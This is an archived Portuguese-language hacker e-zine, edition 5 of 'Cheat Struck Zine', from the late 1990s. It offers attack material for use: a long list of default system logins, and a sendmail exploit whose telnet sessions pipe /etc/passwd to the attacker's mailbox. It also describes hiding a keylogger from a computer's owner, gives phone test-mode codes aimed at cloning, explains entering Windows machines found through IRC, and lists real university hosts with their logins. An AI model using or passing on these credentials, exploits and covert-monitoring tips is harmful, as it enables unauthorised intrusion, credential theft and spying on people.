ZINES — underground e-zine archive source
text size: CRT glow:
~/BRAZILIAN/CSZINE/Cheat_Struck_Zine_05
CSZ - Cheat Struck Zine
edição 5
por: Cheat Struck

*****************************************************************************
Indice:
	1. Introdução
	2. Dicas Hacks
	3. Bugs
	4. VIRII
	5. Programas Hackers
	6. Hacking para iniciantes
	7. Phreaking
	8. Invasão de privacidade
	9. Hack, the Art
	10. Preview

*****************************************************************************
1. Introdução
	Estamos ai de novo. Já estamos na edição 5, quer dizer, eu estou né,
pq eu é que escrevo todo o zine sózinho e por isso é que ele não é tão longo
quanto os outros que circulam pela inet.
	Mas eu acho que apartir daqui as edições irão ficar mais "gordas".
Para se ter uma ideia, a seção Dicas Hacks, que nas outras edições não passa-
vam de 20 linhas, nessa edição só ela tem... a sei lá não vou contar, mas que
ela ta "cheia" tá, deve ter mais de 200 linhas só de passwords defaults dos
mais variados sistemas encontrados na inet.
	Tenho que confesar que tirei coisas de outros zines. Mas os zines que
eu ando "copiando" coisas são zines americanos e espanois que você raramente
irá encontrar por ai. E mesmo assim a maioria das seções, estão coisas que eu
mesmo fiz e esperimentei.
	Aki vc também irá achar a segunda parte do tutorial de ASSEMBLER, eu
tenho que comentar q não fiz nenhum curso especializado nessa linguagem,
apenas fui vendo as fontes de alguns programas e virus e fui testando, por
isso não garanto que a informação contida esteja 100% certa mas até agora,
não tive problemas com meus progs.
	Outra coisa... É precisso ter muita paciencia para fazer um zine
desses sabiam. A um pouco eu estava fazendo um texto para a nova seção "Hack-
ing para iniciantes", estava escrevendo o txt com o edit do DOS quando...PUM!
Abriu mais uma daquelas janelas escrotas do windows, sabe akelas telas azuis
que indicam um erro(OOB). É... por isso eu aconselho aos BEGINERS que querem
ser hackers que instalem logo um UNIX para mim não ter que continuar a digi-
tar esses txts com produtos da microsoft. A não comprem o WIN 98, a primeira
vista ele pode parecer bom e interesante, mas aos poucos vão aparecendo os
bugs.

*****************************************************************************
2. Dicas Hacks
	Aki vai uma lista de contas padrões de Sistemas Operacionais.
	Elas podem ser muito uteis nos atakes a redes que usam esses SOs com
suas próprias contas padrões...
	As contas estão no formato login, senha.

### AIX ###
guest		guest

### AS/400 ###
qsecofr		qsecofr
qsysopr		qsysopr
qpgmr		qpgmr
ibm             password
ibm             2222
ibm             service
qsecofr         1111111
qsecofr         2222222
qsvr            qsvr
secofr          secofr

### DECserver ###
ACCESS
SYSTEM

### HP MPE-XL ###
HELLO           MANAGER.SYS
HELLO           MGR.SYS
HELLO           FIELD.SUPPORT
HELLO	     	FIELD.HPUNSUP
HELLO		FIELD.SUPPORT
HELLO		FIELD.HP
HELLO           OP.OPERATOR
MGR             CAROLIAN
MGR             CCC
MGR             CNAS
MGR             CONV
MGR             COGNOS
OPERATOR        COGNOS
MANAGER         COGNOS
OPERATOR        DISC
MGR             HPDESK
MGR             HPWORD
FIELD           HPWORD
MGR             HPOFFICE
SPOOLMAN        HPOFFICE
ADVMAIL         HPOFFICE
MAIL            HPOFFICE
WP              HPOFFICE
MANAGER         HPOFFICE
MGR             HPONLY
FIELD           HPP187
MGR             HPP187
MGR             HPP189
MGR             HPP196
MGR             INTX3
MGR             ITF3000
MANAGER         ITF3000
MAIL            MAIL
MGR             NETBASE
MGR             REGO
MGR             RJE
MGR             ROBELLE
MANAGER         SECURITY
MGR             SECURITY
FIELD           SERVICE
MANAGER         SYS
MGR             SYS
PCUSER          SYS
RSBCMON         SYS
OPERATOR        SYS
OPERATOR        SYSTEM
FIELD           SUPPORT
OPERATOR        SUPPORT
MANAGER         TCH
MAIL            TELESUP
MANAGER         TELESUP
MGR             TELESUP
SYS             TELESUP
MGE             VESOFT
MGE             VESOFT
MGR             WORD
MGR             XLSERVER

### Major BBS ###
Sysop           Sysop

### PICK O/S ###
DSA
DS
DESQUETOP
PHANTOM

### Prolog ###
PBX             PBX
NETWORK         NETWORK
NETOP           <não tem>

### Rolm ###
op              op
op              operator
su              super
admin           pwp
eng             engineer

### PhoneMail Defaults ###
sysadmin        sysadmin
tech            tech
poll            tech

### RSX ###
SYSTEM		SYSTEM   (Username SYSTEM, Password SYSTEM)
1,1		system      (Directory [1,1] Password SYSTEM)
BATCH		BATCH   (Username SYSTEM, Password SYSTEM)
SYSTEM		MANAGER
USER		USER
MICRO		RSX

### System 75 ###
bcim            bcimpw
bciim           bciimpw
bcms            bcmspw, bcms
bcnas           bcnspw
blue            bluepw
browse          looker, browsepw
craft           crftpw, craftpw, crack
cust            custpw
enquiry         enquirypw
field           support
inads           indspw, inadspw, inads
init            initpw
kraft           kraftpw
locate          locatepw
maint           maintpw, rwmaint
nms             nmspw
rcust           rcustpw
support         supportpw
tech            field

### Taco Bell ###
rgm             rollout
tacobell        <não tem>

### Verifone Junior 2.05 ###
		166816

### VMS ###
field           service
systest         utep

### UNIX ###
root            root
root            system
sys             sys
sys             system
daemon          daemon
uucp            uucp
tty             tty
test            test
unix            unix
unix            test
bin             bin
adm             adm
adm             admin
admin           adm
admin           admin
sysman          sysman
sysman          sys
sysman          system
sysadmin        sysadmin
sysadmin        sys
sysadmin        system
sysadmin        admin
sysadmin        adm
who             who
learn           learn
uuhost          uuhost
guest           guest
host            host
nuucp           nuucp
rje             rje
games           games
games           player
sysop           sysop
root            sysop
demo            demo

### PRIME ###
PRIME           PRIME
PRIME           PRIMOS
PRIMOS          PRIMOS
PRIMOS          PRIME
PRIMOS_CS       PRIME
PRIMOS_CS       PRIMOS
PRIMENET        PRIMENET
SYSTEM          SYSTEM
SYSTEM          PRIME
SYSTEM          PRIMOS
NETLINK         NETLINK
TEST            TEST
GUEST           GUEST
GUEST1          GUEST

### DEC10 ###
1,2:        SYSLIB or OPERATOR or MANAGER
2,7:        MAINTAIN
5,30:       GAMES

###IRIS ###
MANAGER
BOSS
SOFTWARE
DEMO
PDP8
PDP11
ACCOUNTING

*****************************************************************************
3. Bugs
	Agora é pra valer... Ao contrario das primeiras edições, onde eu mos-
trava bugs infames de Windows 95, NT e DOS, agora nessa seção irá sair apenas
bugs que poderão ser muito uteis para invasão a servidores.
        O este bugfaz é permitir que enviando um comando na linha do sendmail
possa conseguir que o fichero de passwords seja enviado para a sua mailbox.
(Por isso é conveniente usar um mail anonimo para não ser achado)
	Sistemas: Unix's em geral, espacialmente AIX e SUNOS
	Versões: Sendmail, versões anteriores a 5.57
	Descrição: Bug de sendmail

Exemplo: em unix ou linux

 saqland % telnet vitima.com 25
 Trying 128.128.128.1...
 Connected to vitima.com
 Escape character is '^]'.
 220 vitima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
 mail from: "|/bin/mail tua_direção@de_mail.com < /etc/passwd"
 250 "|/bin/mail tua_direção@de_mail.com < /etc/passwd"... Sender ok
 rcpt to: qualquerum
 550 qualquerum... User unknown
 data
 354 Enter mail, end with "." on a line by itself
 .
 250 Mail accepted
 quit
 Connection closed by foreign host.
 saqland %

Exemplo: Conexão via DOS ou Windows
	Com um programa de telnet conecte-se a este url -> victima.com:25 ou
se puder configurar nos menus, configure-o para que a conexão seja feita pela
porta 25, que é a do sendmail.

 220 vitima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
 mail from: "|/bin/mail tua_direção@de_mail.com < /etc/passwd"
 250 "|/bin/mail tua_direção@de_mail.com < /etc/passwd"... Sender ok
 rcpt to: qualquerum
 550 qualquerum... User unknown
 data
 354 Enter mail, end with "." on a line by itself
 .
 250 Mail accepted
 quit

Notas:
-vitima.com = url do sistema a ser hackeado.
-saqland = seu url.
-o que aparece com um numero antes são mensagens de sua vitima, o resto é o
que vc tem que escrever.
-Aprenda a usar bem o programa de telnet, porque é o que vc mais vai usar na
hora de hackear.

*****************************************************************************
4. VIRII
	Aki vai a segunda parte do tutorial de assembler escrita por mim.

*****Tutorial de ASSEMBLER parte2*****

##### Colocando labels #####
Coloque o nome do label seguido por :(dois pontos). Exemplo:

inicio:
meio:
fim:

##### Comando JMP #####
Pula para um outro label. Exemplo:

parte1:
add AX,0001
parte2:
jmp parte1

##### Comando DEC #####
Diminui 0001 de um conjunto.
Exemplo:

MOV AX, 0004			; AX = 0004
DEC AX				; 0004(AX) - 0001 = 0003
DEC AX				; 0003(AX) - 0001 = 0002
DEC AX				; 0002(AX) - 0001 = 0001

##### Comando INC #####
Adiciona 0001 em um conjunto.
Exemplo:

MOV AX, 0001			; AX = 0001
INC AX				; 0001(AX) + 0001 = 0002
INC AX				; 0002(AX) + 0001 = 0003
INC AX				; 0003(AX) + 0001 = 0004

##### Conjunto IP #####
IP não é o protocolo usado pelo assembler, não. IP é a linha na qual o
assembler está lendo. Ex:

1565:0100  ADD AX, 0001
     ^^^^--IP
1565:0103  JMP 0100
     ^^^^--IP--^^^^

*****************************************************************************
5. Programas Hackers

*Nome do produto: KeyCopy Version 1.01
*Nome interno: KeyCopy
*Nome do Arquivo: KEYCOPY.COM
*Nome do Autor: Christopher E BoVee
*Marcas Registradas: <
*Idioma: Inglês(E.U.A)
*Versão do produto: 1.01
*CopyRight: (c) Copyright  Christopher E BoVee 1990
*Comentarios: Use o KEYCOPY para pegar qualquer coisa ou qualquer ativasão
do teclado no seu computador.
	Isso inclue quando estiver usando o Wordperfect 5.0, Multimate,Norton
Editor. Keycopy copia todo keystroke para um buffer na area de programa do
KEYCOPY. Bem, o buffer suporta 200 keystrokes na memoria, keycopy copiará o
buffer para um file com a data e hora do acesso. O file padrão é c:\keycopy.
Você pode especificar o drive, subdiretorio e nome do file por haver o file
parametro chamado KC.PRM no subdiretorio onde o KEYCOPY foi executado. O
computador poderá resetar, e executar o Keycopy denovo. Keycopy poderá ser
testado e usado com DOS 3.3 ou 4.0 com mais de 3k de memoria.
	Como usar o Keycopy: Copie-o para o HD e depois digite KEYCOPY no dir
em que ele foi copiado. Pronto, ele está instalado e tudo o que for digitado
no DOS ele copiará para o file "c:\keycopy". Para que o dono do computador
não disconfiar que o keycopy foi instalado, delete-o que ele continuará ins-
talado. Outra coisa: Se o file c:\keycopy começar a ficar muito grande, dele-
te-o tb que ele será criado novamente ao digitarem alguma coisa no DOS. Você
também pode usar o atributo invisivel para esse file, para que não descubram
que ele foi instalado.

*****************************************************************************
6. Hacking para iniciantes
	Seção nova no zine... Aki estarão varias dicas para quem está come-
çando a hackear, como quais os lugares ideais para começarem a hackear e uma
lista de termos usados no underworld.
	Eu estava digitando uma lista de termos usados em redes por hackers e
administradores de rede mas ai abriu um OOB bem na hora deu digitar o "ç".
Por isso nesta edição vou colocar apenas os tipos de sistemas que vc pode e ñ
pode hackear, quer dizer, vc pode fazer o que quizer mas as que eu recomendo
são as seguintes:

* SISTEMAS QUE VOCÊ NÃO DEVE HACKEAR:
-Sistemas de grandes empresas que não poupariam gastos para te encontrar.
-Sistemas governamentais que são muito poderosos.
-Sistemas de companias telefonicas. Que são mais poderosos que os do governo.
-Sistemas que tenham alguma relação contigo. Para não ser identificado.
-Sistemas de empresas de segurança informatica. Saben mais que vc.
-Sistemas da policia. Não convém hackea-los.
-Sistemas de serviços secretos. Nos EUA é um esporte nacional tentar hackear
o FBI e o pentagono, porém é bastante arriscado.

* SISTEMAS QUE VOCÊ DEVE HACKEAR:
-Sites Warez.
-Provedores de pornografia infantil.
-Servidores de grupos terroristas ou fanaticos.
-Sistemas de governos não democraticos.
-Sistemas de traficantes de informação.

	Note que os sistemas que vc deve hackear não podem entrar em contato
com a policia ou qualquer outro departamento por também estarem cometendo um
crime.
	Tá, agora eu vou parar por aki pois já to cheio desses bugs da micro-
soft e se abrir outro OOB agora eu vou me encher e vai ser dificil eu conti-
nuar com o zine em DOS/Windows.

*****************************************************************************
7. Phreaking
	Programando Celulares... Nesta edição vamos aprender a progamar celu-
lares motorola, para que talvéz nos consigamos clonear celulares, já que numa
edição passada eu não consegui colocar nada na materia "cloneando celulares".
	Nessa edição eu tinha um monte de coisas para colocar sobre programa-
ção de celulares mas aí ficou muito cheio então decidi colocar apenas a pro-
gramação em TEST MODE.

### TEST MODE ###

	Tem Muita coisa para colocar nessa seção, por isso vamos ficar apenas
com a parte pratica dos modelos mais atuais.

* PHONES NEWER 95xx
	Muitos phones novos não requerem rudimentos. Se o numero da versão do
seu software é 9526 (Eu acho) ou newer, digite isso:

  FCN + 0 + 0 + * + * + 8 3 7 8 6 6 3 3 + STO

* Outros modelos
	Retire a bateria, localize 3 conectadores de metal... Coloque um
pedaçinho de papel de aluminio no conector do meio. Recoloque a bateria e
ligue-o.

### Programando TEST MODE ###

	Após feito isso irá aparecer umas coisas estranhas, então digite:

32#	para apagar tudo;
38#	para mostrar o conteudo do ESN;
55#	para entrar na programação do test mode;

	Digite 55# para entrar no TEST MODE. Ao entrar no TEST MODE aparecerá
na telinha todo o seu status(Canal, RSSI, TX, e outras coisas que você não
entende)...
	Ao total são 99 comandos que podem ser usados no TEST MODE mas iremos
com calma, então como hoje a seção phreaking está muito grande, aí vai apenas
10 comandos como introdução:

00#  sem função
01#  Reseta o celular, esse comando tem o mesmo efeito que o 13#.
02#  Mostra o status corrente do Telephone. O status pode ser encontrado da
     seguinte forma:

     AAA BBB
     Onde: AAA = Numero do canal(decimal) e BBB = leitura RSSI do canal
     CDEFGHI
     Onde:
     C = frequencia SAT(0=5970, 1=6000, 2=6030, 3=sem channel lock)
     D = Carrier (0=off, 1=on)
     E = Signalling tone (0=off, 1=on)
     F = nível  da Forsa (0 a 7)
     G = Channel mode (0=voice channel, 1=control channel)
     H = Receive audio mute (0=unmuted, 1=muted)
     I = Transmit audio mute (0=unmuted, 1=muted)

     Aperte * para ver a próxima configuração e # para sair.

03#  Reseta Automaticamente o Timer.
04#  Inicia o Telephone com as condições padrões Standard:

     Carrier Off
     Power Level 0
     Receiver Audio Muted
     Transmit Audio Muted
     Signalling Tone Off
     SAT Off
     Resetting of Watch-Dog Timer Enabled
     DTMF and Audio Tones Off
     Audio Path Set to Speaker

05#  TX Carrier On (Tecla Transmisora)
06#  TX Carrier Off
07#  RX Audio Off (Mute Receiver Audio)
08#  RX Audio On (Unmute Receiver Audio)
09#  TX Audio Off
10#  TX Audio On

*****************************************************************************
8. Invasão de privacidade
	É um meio de invasão muito conhecido no underworld. Qualquer um que
tenha um UNIX está protegido mas os usuários de Windows...
	Assim, entre num programa de IRC e descubra o IP ou Host de alguém,
Abra o programa de telnet e conecte-se com o IP/Host, se for um sistema UNIX
você deverá digitar um login valido para aquele sistema, porém se for um WIN
é só entrar e fazer a festa!!!
	Para obter uma lista de IPs que você tem acesso você deve configurar
o WINS e o LMHOSTS. Com isso tb é possivel você entrar em outros sistemas WIN
mesmo usando o Windows.
	Para configurar o WINS entre no painel de controle/rede e veja as
propriedades do protocolo TCP/IP. Aí configure o servidor WINS primario e
secundario. Se você não conhece nenhum coloque os seguintes 204.118.34.6 e
204.118.34.11.
	Já o LMHOSTS é mais fácil, crie um file no c:\Windows chamado LMHOSTS
	Atenção! o file deve se chamar apenas LMHOSTS e não lmhosts.txt
	Agora para ver a lista de sistems que vc tem acesso digite NBTSTAT -N
e aparecerá uma lista de IPs e HOSTs que vc tem acesso.
	Você então pode usar o ícone Ambiente de Rede e mapear os sistemas ou
usar  Telnet. O problema do telnet é que nem sempre os sistemas de usuarios
usam as mesmas portas para acesso a telnet, 23 é a porta padrão e é até capaz
que vc encontre alguns sistemas de users que a usem. Mas se não va testando
com outras portas.
	Aki vai uma lista de portas mais usadas nos seguintes servisos:
FTP(21)
POP3(110)
WWW ou HTTP(80)
IRC(6666, 6667, 6668, 6669)
SOCKS(1080)
TELNET(23)
SMTP(25)

*****************************************************************************
9. Hack, the Art
	Hackear Universidades é uma das coisas mais feitas por hackers que
tão se lichando pra vida. O melhor meio de se hackear universidades é via
telnet. Vc pode encontrar varios endereços de universidades e seus logins
root.
	Eu já dei uma pesquisada e encontrei os seguintes endereços e contas
para duas das maiores universidades daqui do sul:

* PUCRS
url   : aleph.pucrs.br
login : guest

* UFRGS
url   : asterix.ufrgs.br
login : sabibib

	Não lembro a fonte dessas contas mas estavam juntas com urls e logins
de outros servisos telnet que não funcionam mais.

*****************************************************************************
10. Preview
	Na próxima edição...
* Phreaking			'Continuação dos comandos para o TEST MODE
* Hacking para iniciantes	'Grossário de termos usados por hackers
* VIRII				'Continuação do tutorial de ASSEMBLER
* Bugs				'A seção bugs vem com toda a forsa

	Futuras publicações...
* Lista de provedores e endereços ftp do BRASIL.
* Lista de pesquisa Hack versão 2.00.00

*****************************************************************************
By Cheat Struck